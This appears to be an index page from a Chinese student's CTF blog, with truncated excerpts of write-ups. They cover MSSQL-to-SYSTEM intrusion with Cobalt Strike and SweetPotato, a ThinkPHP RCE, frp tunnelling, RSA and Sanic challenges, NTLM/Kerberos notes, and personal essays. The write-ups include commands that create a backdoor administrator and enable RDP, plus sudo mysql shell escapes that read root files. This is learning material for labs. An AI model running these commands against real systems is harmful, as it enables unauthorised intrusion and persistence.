flag
在使用fscan扫描的时候发现存在sqlserver(mssql)弱口令,使用MDUT连接,然后在公网vps起teamserver,往mssql中传cs木马直接上线
最后发现需要提权,因为是mssql系列,考虑Potato提权
使用SweetPotato执行beacon.exe实现system权限木马上线
然后在admin中找到flag
这里是我创建了一个新用户,登录进去之后访问的flag
net user fault qwer! /addnet localgroup administrators fault /addREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d /f
flag
然后我们继续探测内网,传一个fscan上去扫描内网,发现dc机器
到这里,我们搜集用户信息
shell net user
找到还有一个john用户,然后我们尝试看看 ...
队伍情况
队伍名称
图书馆五楼风很大
队伍排名
rk
队伍成员
ksme
TenMape
amunt
fault
[Misc]简历
solved by ksme
🩸🩸 查壳,有UPX壳:
脱壳后IDA及沙箱分析无果,直接foremost得到一张简历图片:
zsteg得到一个default.a的下载链接:
分析default.a,可以看到大量重复的yyttddd:
用厨子xor一下,得到一个新的exe文件:
沙箱未能分析出网络行为,通过IDA分析,可以看到明显的python特征:
尝试使用pyinstxtractor解包失败,最后strings看到了关键信息:
那么思路就很明确了,需要用pupy相关的工具解包,在大量搜索尝试后找到以下可用项目:
安装好依赖库后尝试运行,会出现报错:
对项目中的main.py的.参数尝试多种方法调整未能解决,遂详细审了一下报错,发现问题来自python的uncompyle库中main.py的一条assert语句,于是选择直接将这行注释掉:
再次运行,虽然最后会出现报错,但是需要的C也已经成功输出了:
MD后 ...
flag
访问靶机后有如下
信息搜集
title图标一眼顶针tp,fscan扫出来是tp. rce漏洞
写🐎然后蚁剑
蚁剑
无密码执行mysql
发现无密码执行mysql,利用这个执行命令
查找flag
sudo mysql -e ;\! find / -name flag*;
然后直接cat flag
sudo mysql -e ;\! cat /root/flag/flag.txt;
拿到第一段flag
flag: flagb-
继续信息搜集
flag
发现内网网段,直接fscan
fscan之后发现信呼OA,尝试进行内网穿透
frp搭建
frpc.ini
[common]server_addr = [服务器ip]server_port = [socks_to_] type = tcpremote_port = plugin = socks
在客户机启动
./frpc -c frpc.ini
frps.ini
[com ...
起因
在大约三月份时便听闺蜜的吐槽,说自己几乎每天都有骚扰电话,起初我以为是闺蜜对于个人信息的保护不太重视,而在询问过后得知,其实并非如此,而是自己的信息莫名其妙的被泄露了,我当时只教了她如何保护个人信息以及设置来电拦截后便觉得此事已然了结
今日
知道今天,再次收到闺蜜的吐槽,发现骚扰电话打过来的频率从之前的每天一个左右,到了现在的一天三个,我在惊讶于这个离谱的速度的同时,又收到了舍友的吐槽
正在我沾沾自喜以为自己的信息没被泄露后,仅仅一个小时左右的时间,我也喜提信息泄露大礼包
气愤之余便有了如下对话
fault:你们从哪儿来的我个人信息?XX机构:啊,可能是你之前领过我们机构的书?也有可能是你参加过我们的讲座?fault:我可以很确定我没有XX机构:那我不知道咯,那就有可能是我们代理收上来的
很气!!!!
正当我在和舍友确定是否是同一个电话号码的时候,这个机构的同一个电话号码,三杀!
我在大为震撼的同时,也从他嘴里听到是由于我们参加了讲座从而得到我们的信息的
震撼
在我们聊天对信息的同时,惊奇的发现了一个问题,我与这位同学的学号是连着的,而且我俩的接听时间只差几分钟
那 ...
[RSA]P
加密代码如下
flag = b;NSSCTF******;p = getPrime()q = getPrime()n = p*qe = phi = (p-)*(q-)m = bytes_to_long(flag)c = powmod(m, e, n)print(f;n = n;)print(f;e = e;)print(f;c = c;)
我们发现e很小,所以我们尝试使用小明文去解决
要注意,iroot的[]是结果[]是能否做到
[RSA]P
我们发现这次的e虽然更小了,但是显然得不到
me<nm^{e} < n
me<n
又因为我们知道
c≡me mod Nc \equiv m^{e} \bmod N
c≡memodN
所以我们可以得到
me≡c+k×Nm^{e} \equiv c+k\times N ...
[!NOTE] 一些小小的碎碎念
第一次看到sanic其实是不知所措的,感觉这个虽然是眼熟,但也仅限于眼熟,显而易见的,国赛没有做出来,也因为一些心态问题没有做复盘,时隔近两月,慢慢调整好心态后终于是借着gxn师傅的Sanic revenge进行了整体的复盘
这里放上gxn师傅的博客
https://www.cnblogs.com/gxngxngxn/p/https://www.cnblogs.com/gxngxngxn/p/
ciscn sanic
源码如下
from sanic import Sanicfrom sanic.response import text, htmlfrom sanic_session import Sessionimport pydash# pydash==..class Pollute: def _ ...
系统版本对LM和NTLM的支持
NTLM 认证
简介
NTLM是NT LAN Manager的缩写,NTLM是指telnet的一种验证身份方式,即问询/应答身份验证协议
认证流程
进行一个嫌弃自己的字好丑
这就是我理解的并且画的流程图
用户登录客户端,进行本地认证
客户端首先在本地将当前用户的密码加密为HTLM Hash
确认双方协议版本,客户端向服务器明文发送自己的账号
服务器返回一个十六位随机数,也就是图中的challenge
客户端需要使用本地的NTLM Hash来加密这个challenge并发回给服务器,也就是图中的response
服务器将明文的用户名、challenge、response发给域控制器(DC
域控制器用这个用户名在SAM密码管理库中找此用户对应的NTLM Hash
用这个NTLM Hash来加密服务器发过来的与发给用户端一样的challenge,与服务器端传过来的response进行对比,如果相同,那么就认证成功
本地认证
Windows不会储存用户的明文密码,而是将明文密码加密后储存在SAM中
本地认证的过程中,用户登录时,系统会自动将用户输入的明文 ...
该协议涉及的攻击手段如下
理解协议过程所画的草稿图
鉴于我画的图丑晕了,于是在笔记中还是使用别人的图吧
未引入TGS前的认证流程
客户端向KDC发起对sessionkey的请求,KDC使用数据库中存储的该客户端的密码对sessionkey进行加密,同时向客户端请求的服务器发送同样的sessionkey,但使用服务器端的密码进行加密,然后客户端再使用sessionkey向服务器进行认证
在这个流程中我们可以发现一些问题
.A向KDC申请sessionkey,KDC同时向A和B发送sessionkey,如果由于网络等原因导致B在A向它请求认证时还没有收到sessionkey就会导致认证失败,所以可以尝试在返回给A使用client password加密的sessionkey的时候将本该发给B的信息一同发送给A,再由A向B请求验证的时候一同发送给B
.A提出SessionKey的申请时,KDC凭什么就生成了SessionKey给了A,也就是说,KDC缺乏对A的认证,所以在分发SessionKey之前,KDC需要增加对A的认证,解决办法就是,将KDC机构分成两部分:
AS:Authe ...
fault的
开端
依稀记得今年的开始是刷题,彼时的我刚进入智邮普创一月有余,仍然在刷题积累的阶段,每周要交的周报便是最大的苦恼,周报内容是否完善,是否有收获,是否有质量,这三点便组成了我唯一的苦恼,现在说起来倒有些好笑,最开始的我竟然因为周报而烦恼过哈哈哈哈。在进入minink后有多了每周需要上交的刷题wp,,紧接着就是打N junior,对当时的我确实是一个不小的打击,从觉得自己学了很多到逐渐意识到自己甚至冰山一角都没有触及的过程是比较痛苦的,这就是我在今年遭受的第一次打击。周报与N junior,组成了我今年的开端。
责任
若要说起我今年学到最多的东西,很显然是责任,或者确切些说是如何成为一个大人。
去年刚从高中的大门走出,觉得大学里很多事情都很复杂,总是想躲到师傅身后,让他去替我做所有的决定,然后好逃避自己应该有的责任。从大一下学期开始,无论是与没见过的人打交道,亦或是和同级之间的交往合作,总是让我觉得压力倍增,好在我拥有实验室同级的鼓励和安慰以及师傅时不时的指导,在处理很多事情的时候也有人可以给我一些建议,一切的一切都让我觉得不那么孤单。
到了大二,成为了智邮普创 ...